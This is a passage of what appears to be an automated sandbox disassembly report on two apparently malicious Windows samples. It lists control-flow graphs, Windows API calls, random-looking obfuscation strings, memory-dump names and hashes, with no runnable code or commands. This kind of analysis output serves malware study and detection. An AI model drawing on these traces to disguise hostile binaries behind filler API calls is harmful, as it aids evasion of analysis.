                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -$sibepeyedupucis
                                                                                                                                                                • API String ID: 2332831159-1718117500
                                                                                                                                                                • Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
                                                                                                                                                                • Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 171 418b56-418b5d 172 418b60-418b7b call 418b10 171->172 175 418bb6-418bb9 172->175 176 418b7d-418bb0 GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 172->176 175->172 177 418bbb-418bc0 175->177 176->175 179 418bc2-418bcc 177->179 180 418bd6-418bd9 177->180 179->180
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -$sibepeyedupucis
                                                                                                                                                                • API String ID: 1414951042-1718117500
                                                                                                                                                                • Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
                                                                                                                                                                • Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 181 418be0-418c07 182 418c09-418c17 QueryDosDeviceA 181->182 183 418c1d 181->183 182->183 184 418c22 call 418ae0 183->184 185 418c27-418c2e 184->185 186 418c30-418c32 FreeEnvironmentStringsA 185->186 187 418c38-418c4d call 418b20 185->187 186->187 190 418c66-418c69 187->190 191 418c4f-418c60 HeapDestroy GetNumaProcessorNode 187->191 192 418c6b call 401000 190->192 191->190 193 418c70-418c73 192->193
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(jutusenavocibiyaxunokubiyefet,?,00000000), ref: 00418C17
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418C51
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60
                                                                                                                                                                Strings
                                                                                                                                                                • jutusenavocibiyaxunokubiyefet, xrefs: 00418C12
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID: jutusenavocibiyaxunokubiyefet
                                                                                                                                                                • API String ID: 4159173863-2484441926
                                                                                                                                                                • Opcode ID: 5ac95634ee3b73ff1daa8c9c947de5f20d0109c9affbe59bd8529e564f76d465
                                                                                                                                                                • Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
                                                                                                                                                                • Opcode Fuzzy Hash: 5ac95634ee3b73ff1daa8c9c947de5f20d0109c9affbe59bd8529e564f76d465
                                                                                                                                                                • Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 194 403501-40351c call 402324 call 4028f1 199 40353b-403553 call 40182d 194->199 200 40351e-403522 194->200 205 403555-403557 199->205 206 40358b-403597 call 40359c 199->206 200->199 202 403524 200->202 204 403527-403529 202->204 207 403533-40353a call 402369 204->207 208 40352b-403532 call 402d79 204->208 210 403573-403585 InterlockedIncrement 205->210 211 403559-403562 InterlockedDecrement 205->211 206->204 208->207 210->206 211->210 217 403564-40356a 211->217 217->210 218 40356c-403572 call 40100f 217->218 218->210
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 0040350D
                                                                                                                                                                  • Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
                                                                                                                                                                  • Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 0040352D
                                                                                                                                                                • __lock.LIBCMT ref: 0040353D
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040355A
                                                                                                                                                                • InterlockedIncrement.KERNEL32(005B2B00), ref: 00403585
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                                                • Opcode ID: 0fb39e8464d5a2b3aa83b1e2368a65283da0ec9139f026891d80e097134ada15
                                                                                                                                                                • Instruction ID: b38363795809dd3546f55198ca21e0ce7f03dabd1553070faffb9ee770236157
                                                                                                                                                                • Opcode Fuzzy Hash: 0fb39e8464d5a2b3aa83b1e2368a65283da0ec9139f026891d80e097134ada15
                                                                                                                                                                • Instruction Fuzzy Hash: 7D018E72D01621BBCB11AF66A80979E7B64BF04725F40813BE814772E0C77C9A419BCD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 221 40100f-401020 call 402324 224 401022-401029 221->224 225 401097-40109c call 402369 221->225 226 40102b-401043 call 40182d call 401860 224->226 227 40106e 224->227 239 401045-40104d call 401890 226->239 240 40104e-40105e call 401065 226->240 231 40106f-40107f HeapFree 227->231 231->225 233 401081-401096 call 40166e GetLastError call 40162c 231->233 233->225 239->240 240->225 246 401060-401063 240->246 246->231
                                                                                                                                                                APIs
                                                                                                                                                                • __lock.LIBCMT ref: 0040102D
                                                                                                                                                                  • Part of subcall function 0040182D: __mtinitlocknum.LIBCMT ref: 00401843
                                                                                                                                                                  • Part of subcall function 0040182D: __amsg_exit.LIBCMT ref: 0040184F
                                                                                                                                                                  • Part of subcall function 0040182D: EnterCriticalSection.KERNEL32(?,?,?,0040258D,00000004,0041B548,0000000C,004010B7,?,?,00000000), ref: 00401857
                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 00401038
                                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 00401047
                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,0041B4C0,0000000C,004028E2,00000000,?,00402BD8,?,00000001,?,?,004017B7,00000018,0041B528,0000000C), ref: 00401077
                                                                                                                                                                • GetLastError.KERNEL32(?,00402BD8,?,00000001,?,?,004017B7,00000018,0041B528,0000000C,00401848,?,?,?,0040258D,00000004), ref: 00401088
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                                                • Opcode ID: 88e18c0cf56d15f127b898dc0920ea4c7a6c59c617d5a2bcd1795d90db3bafc7
                                                                                                                                                                • Instruction ID: 82808b4b38e146a2ce22b6fc7430859710347c24705f98adbb9cb817f3ceedf7
                                                                                                                                                                • Opcode Fuzzy Hash: 88e18c0cf56d15f127b898dc0920ea4c7a6c59c617d5a2bcd1795d90db3bafc7
                                                                                                                                                                • Instruction Fuzzy Hash: 2B01DB729013459BDB307F729C0AB5E3B64AF00764F10853FF544761E1CB7C85808A5D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 247 408484-408491 GetModuleHandleA 248 408493-4084a1 GetProcAddress 247->248 249 4084a8 247->249 248->249 250 4084a3-4084a7 248->250 252 408480-408483 249->252 253 40847b-40847f 249->253
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004040A0), ref: 00408489
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408499
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                                                                • Opcode ID: 4bbef799300f6a31148cb669580f07f4f269d62d16060a35c0fb901ff634b035
                                                                                                                                                                • Instruction ID: dfe559acda7b54e879ae74bae017c07ad221b521cb95bab70d62cab3d7b49331
                                                                                                                                                                • Opcode Fuzzy Hash: 4bbef799300f6a31148cb669580f07f4f269d62d16060a35c0fb901ff634b035
                                                                                                                                                                • Instruction Fuzzy Hash: F8F03030A40A0ED2EF002BB1BD0E7AF7A74FB94706F9645A5D5D1B00D4DF7880B9829A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 255 408370-40837b 256 4083dc-4083ee call 407c61 255->256 257 40837d-408380 255->257 260 4083f3-4083f7 256->260 257->256 259 408382-408385 257->259 261 4083a0-4083a3 259->261 262 408387-40839f call 4081bb 259->262 264 4083c3-4083da call 407d51 261->264 265 4083a5-4083a8 261->265 264->260 265->264 267 4083aa-4083c1 call 408276 265->267 267->260
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                • Instruction ID: 90881730480e07db8bfbb96aa53543ddcb4327a5d8f2a223ca44fba9169e931e
                                                                                                                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                • Instruction Fuzzy Hash: FD11753200414EFBCF125E85DD41CEE3F22BF58754B58842AFE9865271DA3BC972AB85

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 272 403c6d-403c88 call 402324 call 4028f1 277 403c8a-403c8e 272->277 278 403cac-403cd5 call 40182d call 403c2f call 403cd7 272->278 277->278 280 403c90-403c95 call 4028f1 277->280 286 403c98-403c9a 278->286 280->286 288 403ca4-403cab call 402369 286->288 289 403c9c-403ca3 call 402d79 286->289 289->288
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 00403C79
                                                                                                                                                                  • Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
                                                                                                                                                                  • Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901
                                                                                                                                                                • __getptd.LIBCMT ref: 00403C90
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00403C9E
                                                                                                                                                                • __lock.LIBCMT ref: 00403CAE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                                                • Opcode ID: 871ed6f757789ca6b79915de1d572e55a2714164683be5c656cbc2df2ece1b14
                                                                                                                                                                • Instruction ID: 2bbd45e75700c65cc27abf153e1d036acd447da389ceb688e001def5a2c8595a
                                                                                                                                                                • Opcode Fuzzy Hash: 871ed6f757789ca6b79915de1d572e55a2714164683be5c656cbc2df2ece1b14
                                                                                                                                                                • Instruction Fuzzy Hash: 97F06233904B00CAE710BF7A850A78977A4BF00719F10813FE850F72D1CB7C9A019B5A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 295 418940-418a80 GetModuleHandleW GetProcAddress
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1646373207-3916222277
                                                                                                                                                                • Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
                                                                                                                                                                • Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 401681-4016a3 HeapCreate 1 4016a5-4016a6 0->1 2 4016a7-4016b0 0->2
                                                                                                                                                                APIs
                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00401696
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                • Opcode ID: 3982efe7e8d0da8a06038be50c5490b5aa4dd6714f050852aabdf92f820ef895
                                                                                                                                                                • Instruction ID: 950317061b0095c29fadf9183ea52f7ffedac7be607a61dc60530f93d8d7338d
                                                                                                                                                                • Opcode Fuzzy Hash: 3982efe7e8d0da8a06038be50c5490b5aa4dd6714f050852aabdf92f820ef895
                                                                                                                                                                • Instruction Fuzzy Hash: 9DD05E729543455ADB009F707C09BA63BECA784795F048836F81CC6190E67AC950D648

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 68 4189c0-4189e8 call 409710 71 4189f0-4189f7 68->71 72 418a24-418a2a 71->72 73 4189f9-418a22 GetVolumeInformationA 71->73 74 418a2c-418a38 72->74 75 418a3e-418a48 72->75 73->72 74->75 76 418a83-418a8a 75->76 77 418a4a-418a79 WriteConsoleOutputAttribute 75->77 76->71 78 418a90-418a96 76->78 77->76 79 418a98-418a9e 78->79 80 418aa0-418aa6 79->80 81 418aac-418ab6 79->81 80->81 82 418ab8 GetCommandLineW 81->82 83 418aba-418ac1 81->83 82->83 83->79 84 418ac3-418aca 83->84 85 418ad0-418bf3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW call 4058c0 GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 84->85 86 418c23-418c2f 84->86 94 418c01-418c08 85->94 95 418bf5-418bfb ObjectPrivilegeAuditAlarmA 85->95 87 418c31-418c3f SetCommMask GetLastError 86->87 89 418c51-418c57 87->89 90 418c41-418c4b GetUserObjectInformationW 87->90 92 418c62-418c69 89->92 93 418c59-418c60 89->93 90->89 98 418c6b-418cda GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryTypeA PurgeComm call 40109d call 40100f * 2 call 40109d call 40100f call 401204 92->98 99 418cdd-418cec call 418650 92->99 93->87 93->92 96 418c12-418c20 call 40121b call 401363 94->96 97 418c0a-418c0c WaitForSingleObject 94->97 95->94 96->86 97->96 98->99 107 418d1d-418d3e LoadLibraryA call 418680 call 418920 99->107 108 418cee-418cff 99->108 123 418d40-418d47 107->123 113 418d00-418d10 108->113 116 418d12 113->116 117 418d18-418d1b 113->117 116->117 117->107 117->113 125 418d49-418d57 GlobalAlloc GetStdHandle MoveFileW 123->125 126 418d5d-418d63 123->126 125->126 128 418d65 call 418670 126->128 129 418d6a-418d71 126->129 128->129 132 418d73-418d7e InterlockedCompareExchange 129->132 133 418d84-418d8b 129->133 132->133 133->123 135 418d8d-418d9d 133->135 136 418da0-418db0 135->136 137 418db2-418db7 GetFileAttributesA 136->137 138 418db9-418dbc 136->138 137->138 138->136 139 418dbe-418dc9 138->139 140 418dd0-418dd5 139->140 141 418dd7-418ddd 140->141 142 418ddf-418de5 140->142 141->142 143 418de7-418df4 call 401000 141->143 142->140 142->143
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00418A22
                                                                                                                                                                • WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00418A6D
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 00418AB8
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418AE4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418AF6
                                                                                                                                                                • SearchPathA.KERNEL32(wapopasihe,nemagutimebonefotekoneb,bopuwofebakuduwin,00000000,?,?), ref: 00418B1A
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
                                                                                                                                                                • _memset.LIBCMT ref: 00418B50
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418B89
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
                                                                                                                                                                • SetCommMask.KERNEL32(00000000,00000000), ref: 00418C35
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00418C37
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
                                                                                                                                                                • GetBinaryTypeA.KERNEL32(bahujijudunogikawatihohelujof,?), ref: 00418CA6
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
                                                                                                                                                                • _calloc.LIBCMT ref: 00418CB6
                                                                                                                                                                • _calloc.LIBCMT ref: 00418CC9
                                                                                                                                                                • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00418D22
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00418D4D
                                                                                                                                                                • GetStdHandle.KERNEL32(00000000), ref: 00418D51
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E
                                                                                                                                                                • GetFileAttributesA.KERNEL32(mufolomeragakowubicigero), ref: 00418DB7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
